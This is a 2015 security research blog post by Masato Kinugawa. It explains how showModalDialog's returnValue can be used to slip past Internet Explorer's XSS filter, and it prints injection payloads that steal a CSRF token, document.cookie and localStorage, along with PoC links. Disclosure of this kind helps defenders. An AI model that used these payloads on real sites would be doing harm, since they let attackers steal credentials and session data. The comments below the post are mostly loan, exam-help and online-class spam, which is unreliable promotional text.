Tuesday, June 16, 2015

Bypassing IE's XSS Filter with showModalDialog

Hi there! I'm Masato Kinugawa. Finally, I started my blog in English :)
Also I will continue to write in Japanese as until now: http://masatokinugawa.l0.cm/
Today, I want to share IE's XSS filter bypass with showModalDialog.

showModalDialog function is old and has been removed from the web standards, but it has unique mechanism. I thought it might make my day. That's why I started looking into it.
The function is still supported by IE, Firefox and Safari.

First of all, let's recap usage of showModalDialog.


The first argument is URL which you want to open in the modal dialog.
The second argument is the argument which you want to pass to the modal dialog. And you can use it through window.dialogArguments property in the modal window.


To pass argument through window.dialogArguments, it seems that two windows must be same origin.

But it is different in case of returnValue. Two windows don't have to be same origin in Safari and IE. (Only Firefox needs same origin)

Here is my test page:
http://vulnerabledoma.in/showModalDialog/opener.html

Safari can pass it to different origin simply. Please test from the "x-origin" button.
To reproduce on IE, we need 3xx redirect. Please test from the "x-origin(redirect)" button.

This behavior means that we can pass information to another origin's page via returnValue property in Safari and IE. It might make a hole in some web application. But of course, I don't want to enlighten secure usage of showModalDialog in 2015 :)

Let's go to the main, bypass IE's XSS filter.


Exploitable Conditions:
  1. XSS exists in string literal of JS.
  2. Any JS property contains sensitive information.

The following is my test page:

http://vulnerabledoma.in/xss_token?q=[XSS_HERE]
<form name=form>
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="[XSS_HERE]"</script>

Seeing is believing. Please go to the following PoC using IE:

http://l0.cm/xssfilter_bypass/showModalDialog.html

If it goes well, you can see token strings in alert when you closed the modal dialog.

Let's take a look at details. The redirect takes you to:

http://vulnerabledoma.in/xss_token?q=%22%3BreturnValue=form.token.value//

The payload is injected:
<form name=form>
<input type=hidden name=token value=f9d150048b>
</form>
<script>var q="";returnValue=form.token.value//"</script>
Then, the token is passed into returnValue. Yeah!!

Needless to say, also it works:

";returnValue=document.cookie//
";returnValue=localStorage.key//

I have tried unsuccessfully to access other page's window object through window.opener. Any idea?

That's all. Understood? :)

FYI, I have blogged about some XSS filter bypass techniques in the past. (Sorry, Japanese text only)
If you are interested in other bypasses, please read using Google Translate.


ブラウザのXSS保護機能をバイパスする(1) (2012/2)
ブラウザのXSS保護機能をバイパスする(2) (2012/3)
ブラウザのXSS保護機能をバイパスする(3) (2012/9)
ブラウザのXSS保護機能をバイパスする(4) (2014/9)
ブラウザのXSS保護機能をバイパスする(5) (2014/10)

I'm going to continue to write blog in English as far as possible. 
Thank you!

Update(2015/6/17)

I found a way to pass other same-origin page's information via returnValue.
Anyway please go to the following page and click the "go" button.

http://l0.cm/xssfilter_bypass/showModalDialog2.html

If it goes well, you can see "<h1>This is secret Text!</h1>" of  other same-origin page's information in alert dialog. In this PoC, we don't need 3xx redirect. It seems that we can set returnValue from x-origin page in iframe which exists in showModalDialog.

9 comments:

  1. One call! Capable people who really tuned in and guided me through the credit application process. An exchange of messages and the next day, my development returns were in my record! I can't imagine a more direct, less complex, all the more straightforward knowledge.
    Personal Loans for Bad credit
    Loans for Bad credit

    ReplyDelete
  2. The association was basic and the underwriting was speedy. The credit official was especially master and heartfelt
    Online Loans for Bad credit
    Loans for people with bad credit

    ReplyDelete
  3. Due to the Professionalism of the specialist, I had the choice to gain a Personal Loan.
    Car Loans for Bad credit
    Bad Credit Loans

    ReplyDelete
  4. The experience it was fundamental and easy to apply for a development. No issues, no mystery costs, incredibly capable.
    Bad Credit Loans Personal
    Bad Credit Loans for people

    ReplyDelete
  5. Understanding these vulnerabilities is crucial for web developers and security professionals to better protect against such attacks. The X-XSS-Nightmare exploit underscores the importance of thorough code review, robust security testing, and staying updated on the latest security trends and patches. while diving into the intricacies of web security is captivating, I've also been busy preparing for exams, such as the GRE. Balancing study sessions with staying informed about cybersecurity developments can be challenging at times. There were moments when I felt overwhelmed and wished I could find someone to take my GRE exam for me, but I know that mastering these skills is essential for my future career.

    ReplyDelete
  6. Congratulations on starting your English blog, Masato! It's great to see you expanding your reach and sharing your knowledge across different languages. The topic you're exploring sounds intriguing—XSS filter bypass with showModalDialog. It's fascinating how even older functions like showModalDialog can still have significant implications. As we focus on our online exams, it's essential to stay informed about cybersecurity issues like XSS vulnerabilities. Thanks for sharing your insights—I'll be sure to check out your blog for more updates!

    ReplyDelete
  7. Connections offers a rich and rewarding experience for word game enthusiasts. By understanding the game’s patterns, expanding your vocabulary, and employing effective strategies, you can enhance your gameplay and achieve success.

    ReplyDelete
  8. Education and lifelong learning are crucial components of modern nursing. The rapidly changing online class help services nature of healthcare means that nurses must continually update their knowledge and skills to keep pace with new developments. Many nurses pursue advanced degrees, certifications, and continuing education opportunities to enhance their expertise and stay current in their field. This commitment to professional development not only improves the quality of care that nurses provide but also opens up new career opportunities and pathways for advancement.

    ReplyDelete
  9. The leadership role of nurses has also become more prominent in recent years. Nurses are increasingly taking on leadership positions within healthcare organizations, shaping policies, and driving quality improvement initiatives. Their unique perspective online class services as frontline caregivers gives them valuable insights into the challenges and opportunities within healthcare, making them effective leaders and change agents. Nursing leadership is essential in promoting a culture of safety, improving patient outcomes, and ensuring that healthcare systems operate efficiently and effectively.

    ReplyDelete